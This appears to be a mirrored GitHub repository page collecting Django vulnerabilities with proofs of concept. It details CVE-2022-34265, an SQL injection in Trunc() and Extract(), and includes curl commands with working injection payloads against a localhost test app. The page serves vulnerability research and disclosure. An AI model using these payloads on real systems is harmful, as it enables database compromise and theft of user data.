Giters

yoryio / django-vuln-research

Collection of Django CVEs with PoCs

Repository from Github https://github.comyoryio/django-vuln-researchRepository from Github https://github.comyoryio/django-vuln-research

Django Vulnerability Research

Vulnerabilities

CVE-2022-34265

  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command
  • CVSS: 9.8 CRITICAL
  • EPSS: 0.54%
Cause
  • SQL Injection due to an Improper Neutralization of special elements used in the following functions with these arguments:
    • Trunc() - kind
    • Extract() - lookup_name
Impact
  • Complete compromise of user information

Commit

PoC

# Normal URL
curl "http://localhost:4131/extract/?lookup_name=year"
curl "http://localhost:4131/trunc/?kind=year"

# URL where the database instruction can be executed
curl "http://localhost:4131/extract/?lookup_name=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20PG_SLEEP(5)--"
curl "http://localhost:4131/trunc/?kind=year%27,%20start_datetime))%20OR%201=1;SELECT%20PG_SLEEP(5)--"
  • Discovered by Takuto Yoshikai (Aeye Security Lab)
  • Please check the following GitHub Repository for more information: CVE-2022-34265

CVE-2020-13524

CVE-2020-7471

CVE-2019-19844

CVE-2014-0472

Resources

About

Collection of Django CVEs with PoCs

Languages

Language:Python 94.1%Language:Dockerfile 5.9%